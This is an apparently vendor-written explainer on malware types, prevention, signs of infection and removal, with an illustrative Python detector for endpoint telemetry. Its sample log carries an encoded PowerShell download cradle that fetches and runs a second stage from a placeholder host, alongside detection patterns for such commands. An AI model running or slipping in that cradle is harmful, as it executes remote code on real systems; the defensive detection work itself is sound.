Malware Definition
Malware (malicious software) is an umbrella term for any program or code created to harm a computer, network, or server. Cybercriminals develop malware to infiltrate a system discreetly and then steal, corrupt, or destroy sensitive data and the systems that hold it. Malware infections, in their many forms, make up most of the online threat landscape.
Hackers have different goals when performing a malware attack on a system or organization, and it often depends on who is on the receiving end and the type of attack. Some of the most common goals of a malware attack include:
- Make a profit off targets
- Sabotage
- Steal confidential data
- Make a statement
- Bragging rights
Types of Malware
In the years since the Morris Worm debuted, adversaries have applied a great deal of creativity to the concept of malware, coming up with new types of attacks as enterprise technology has evolved. The most common types of malware today are:
Type | Description |
---|---|
Ransomware | In a ransomware attack, an adversary encrypts a victim’s data and offers to provide a decryption key in exchange for a payment. Ransomware attacks are usually launched through malicious links delivered via phishing emails, but unpatched vulnerabilities and policy misconfigurations are used as well. |
Fileless Malware | Fileless malware is malicious activity that uses native, legitimate tools already present on the system (PowerShell, WMI, scripting hosts, Office macros) to carry out an attack. Unlike traditional malware, it does not drop an executable file on disk: its code lives in memory, scripts, or registry entries and runs inside trusted processes, which makes it hard for file-based scanning to detect. |
Spyware | Spyware is a type of unwanted, malicious software that infects a computer or other device and collects information about a user’s web activity without their knowledge or consent. |
Adware | Adware is software that monitors a user's online activity in order to decide which advertisements to show them; when it does so covertly it shades into spyware. Adware is not always malicious in intent, but it degrades device performance and the user experience. |
Trojan | A trojan is malware that masquerades as legitimate software, such as a native operating system program or a harmless file like a free download. Trojans are installed through social engineering techniques such as phishing or bait websites. Zeus, a well-known banking trojan, steals financial information and adds infected machines to a botnet. |
Worms | A worm is a self-contained program that replicates itself and spreads copies to other computers without user action. A worm may infect its target through a software vulnerability, or it may be delivered via phishing or smishing. Once resident, a worm can modify and delete files, install additional malware, or keep replicating until the targeted system runs out of resources. |
Rootkits | A rootkit is a collection of software designed to give malicious actors persistent, privileged control of a computer, network, or application while hiding its own presence. Once active, it sets up a backdoor and may deliver additional malware. Bootkits take this a step further by infecting the master boot record or boot loader so that they load before the operating system does, which can make them very hard to detect. |
Mobile Malware | Mobile malware is any type of malware designed to target mobile devices. Mobile malware is delivered through malicious downloads, operating system vulnerabilities, phishing, smishing, and the use of unsecured WiFi. |
Exploits | An exploit is a piece of software or data that opportunistically uses a defect in an operating system or an app to provide access to unauthorized actors. The exploit may be used to install more malware or steal data. |
Scareware | Scareware tricks users into believing their computer is infected with a virus. Typically, the user sees a pop-up warning that their system is infected. This scare tactic aims to persuade people into installing fake antivirus software to remove the "virus"; once installed, that fake antivirus software may itself deliver the malware. |
Keylogger | Keyloggers are tools that record what a person types on a device. While there are legitimate and legal uses for keyloggers, many uses are malicious. In a keylogger attack, the keylogger software records every keystroke on the victim’s device and sends it to the attacker. |
Botnet | A botnet is a network of computers infected with malware that are controlled by a bot herder. The bot herder is the person who operates the botnet infrastructure and uses the compromised computers to launch attacks designed to crash a target's network, spread malware, harvest credentials, or execute CPU-intensive tasks such as cryptomining. |
Malspam | Malicious spam (malspam) delivers malware via email, either as an infected attachment or as a link to a malicious download. |
Malware Infection Across Devices
Any type of device can be infected with malware if it is not covered by a security strategy that extends to endpoints and IoT devices alike. Examples include:
- PC Malware: Many malware variants specifically target PCs, such as WannaCry ransomware, and zero-day exploits are often used to deliver them.
- Mac Malware: Contrary to popular belief, Macs can also be infected. CrescentCore is a relatively recent macOS malware family known for evading Mac security countermeasures. Protect your Mac with a comprehensive security solution that covers all endpoints.
- Android Malware: Phones running Android are also susceptible to malware, which usually arrives in suspicious text messages and in emails opened through a mobile email app.
- iOS Malware: iPhones and iPads running iOS can be compromised via social engineering. One of the best-known iOS threats is the Pegasus spyware.
18 Tips to Prevent a Malware Attack
For most businesses, deploying a breach prevention solution or platform that continuously monitors for malware attacks will be the first line of defense. Here are a few more tips to help you and your organization minimize the risks of a malware attack:
- Do not download software from unknown sources.
- Do not click on pop-ups.
- Follow strong password best practices such as changing default passwords and using a variety of characters.
- Implement identity and access management capabilities such as multi-factor authentication (MFA).
- Use a VPN on untrusted networks such as public Wi-Fi so that your traffic is encrypted in transit. A VPN protects the connection, not the device: it does not stop malware you download.
- Do not lend your devices to anyone else, even if it is someone you know.
- Do not open emails and/or attachments from unknown senders.
- Do not click on unknown links on social media, emails, text messages, or any other device.
- Pay attention to the domain you are visiting. Lookalike and unfamiliar domains are common in phishing, and a familiar top-level domain (.com, .org, .edu, .gov, etc.) is not by itself a guarantee that a site is safe.
- Do not download unknown software; when you do download trusted software, install only the components you actually need.
- Delete apps or programs you do not use anymore.
- Be careful with the apps you download. Check app store reviews and publisher details for reports of malicious behavior.
- Do not jail-break your phone.
- Keep your operating systems and plugins up to date and only download official updates.
- Back up your data! If you ever lose it, for example to ransomware, you will be able to recover it. Keep at least one copy offline or otherwise out of reach of the account being backed up, so the backup cannot be encrypted along with the originals.
- Implement a comprehensive cybersecurity training program for stakeholders to spread awareness of most common adversaries, ways they operate, and best practices to take to prevent an attack.
- Shift to a culture centered on security to ensure it is something everyone thinks about at every step of every process.
- Install cybersecurity software with threat intelligence capabilities to stay on top of all adversaries to prevent an attack and quickly remediate if there is a breach.
How to Detect Malware
No matter how well you try to avoid malware, you’re likely to run into newer, more innovative variants at some point. When you do, advanced malware protection is your best defense.
Advanced malware protection uses a unique and integrated combination of methods to prevent and detect known malware, unknown malware, and fileless malware. These methods include machine learning, exploit blocking, behavioral analysis, and blacklisting.
Traditional signature-based antivirus (AV) on its own is no longer enough to detect malware, since it cannot recognize novel variants or fileless attacks that never write a recognizable file to disk.
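To make the detection methods above concrete, here is a small added example (illustrative code written for this article, not CrowdStrike or Falcon code) that runs three of them over a handful of constructed endpoint telemetry events: a hash denylist check (blacklisting), a behavioral rule for the fileless technique described in the table above (a living-off-the-land binary such as powershell.exe launched with an encoded command, which the rule decodes so an analyst can read the payload), and a mass-rename heuristic for the ransomware behavior also described there. The JSON event schema, hostnames, paths, hash values, and the encoded payload are all constructed for the example.

```python
# Toy endpoint detection over constructed telemetry. Added illustration for this
# article, not CrowdStrike/Falcon code; schema, hosts, paths and hashes are made up.
import base64
import hashlib
import json
import re
from collections import defaultdict

# Known-bad SHA-256 denylist (blacklisting). Placeholder: hash of b"test", not real malware.
HASH_DENYLIST = {hashlib.sha256(b"test").hexdigest()}

# Living-off-the-land binaries commonly abused by fileless malware.
LOLBINS = {"powershell.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "wscript.exe", "cscript.exe", "certutil.exe"}
# Command-line markers that make a LOLBin launch suspicious.
SUSPICIOUS_ARGS = re.compile(
    r"(?i)(-enc(odedcommand)?\b|\bIEX\b|Invoke-Expression|DownloadString|FromBase64String)")

# Extensions ransomware families commonly append to encrypted files.
RANSOM_EXTENSIONS = {".locked", ".encrypted", ".crypt"}
RANSOM_THRESHOLD = 5  # renames to such an extension by a single process

def basename(path):
    """Last path component for Windows or POSIX separators, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()

def decode_encoded_command(cmdline):
    """Cleartext of a PowerShell -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = re.search(r"(?i)-enc(?:odedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def check_process(ev):
    """Denylist and fileless/LOLBin rules for one process-creation event."""
    alerts = []
    image = basename(ev["image"])
    if ev.get("sha256", "").lower() in HASH_DENYLIST:
        alerts.append({"rule": "denylist_hash", "host": ev["host"], "pid": ev["pid"], "image": image})
    cmdline = ev.get("cmdline", "")
    if image in LOLBINS and SUSPICIOUS_ARGS.search(cmdline):
        alerts.append({"rule": "fileless_lolbin", "host": ev["host"], "pid": ev["pid"],
                       "image": image, "decoded": decode_encoded_command(cmdline)})
    return alerts

def check_ransomware(file_events):
    """Behavioral rule: one process renaming many files to a ransom extension."""
    counts = defaultdict(int)
    for ev in file_events:
        ext = "." + basename(ev["target"]).rpartition(".")[2]
        if ev["action"] == "rename" and ext in RANSOM_EXTENSIONS:
            counts[(ev["host"], ev["pid"])] += 1
    return [{"rule": "mass_rename", "host": h, "pid": p, "count": c}
            for (h, p), c in counts.items() if c >= RANSOM_THRESHOLD]

def analyze(lines):
    """Parse JSON-lines telemetry and return every alert raised."""
    procs, files = [], []
    for line in lines:
        ev = json.loads(line)
        (procs if ev["type"] == "process" else files).append(ev)
    alerts = [a for ev in procs for a in check_process(ev)]
    alerts.extend(check_ransomware(files))
    return alerts

# Constructed sample telemetry: an encoded PowerShell download cradle, a denylisted
# binary that then renames six documents, and benign notepad activity.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_LOG = [
    json.dumps({"type": "process", "host": "ws01", "pid": 4120, "sha256": "11" * 32,
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "cmdline": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED}"}),
    json.dumps({"type": "process", "host": "ws01", "pid": 4188, "cmdline": "invoice.exe",
                "image": r"C:\Users\alice\Downloads\invoice.exe",
                "sha256": hashlib.sha256(b"test").hexdigest()}),
    json.dumps({"type": "process", "host": "ws02", "pid": 900, "sha256": "22" * 32,
                "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"}),
] + [
    json.dumps({"type": "file", "host": "ws01", "pid": 4188, "action": "rename",
                "target": rf"C:\Users\alice\Documents\report{i}.docx.locked"}) for i in range(6)
] + [
    json.dumps({"type": "file", "host": "ws02", "pid": 900, "action": "write",
                "target": r"C:\Users\bob\notes.txt"}),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

Run against the constructed log, analyze() raises exactly three alerts: the encoded PowerShell launch (with the download cradle decoded), the denylisted invoice.exe, and the same process renaming six documents to .locked; the notepad activity raises nothing. The point is that only the second alert depends on knowing the sample's hash in advance; the other two are behavioral and would fire on a never-before-seen variant, which is why the fileless and unknown-malware cases call for more than signature matching.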
Signs You Have a Malware Infection
Signs and symptoms of malware can be obvious or subtle. Here are a few common signs that may indicate you have a malware infection:
- Slow computer
- Very frequent ads and pop-ups, especially if they appear in unexpected places
- Battery drains rapidly
- System crashes
- Sudden loss in disk space
- Browser settings change on their own
- Browser redirects on its own
- Unfamiliar apps appear on mobile device
- Increase in system’s internet activity
- Disabled antivirus product
- Lost access to files or computer
- Deleted files
- Contacts receive strange messages from you
How to Remove Malware
The key to removing malware from your device is installing and running next-generation antivirus (NGAV) software. Upon detecting malware, NGAV can help identify and remediate malicious artifacts left behind from malicious activity.
For maximum efficacy, it’s crucial to keep your antivirus software updated so that it can stay ahead of constantly evolving malware attacks. The Falcon platform offers a next-gen solution that allows for automatic sensor update and constant system scans – users do not have to worry about manually updating the software or scanning for malware.
Here are some additional resources that can guide you through the process of removing malware:
Protect Against Malware
The first step to protect against malware attacks is to adopt a proactive approach by following the prevention tips mentioned above. Nevertheless, this is not a perfect world and a breach might still happen.
With the growing threat of mobile malware, organizations need visibility into which devices are accessing their networks and how they're doing it. CrowdStrike's Falcon for Mobile delivers mobile endpoint detection and response with real-time visibility into IP addresses, device settings, Wi-Fi and Bluetooth connections, and operating system information.
Want to see how the CrowdStrike Falcon® Platform blocks malware? Start a free trial and see how it performs against live malware samples.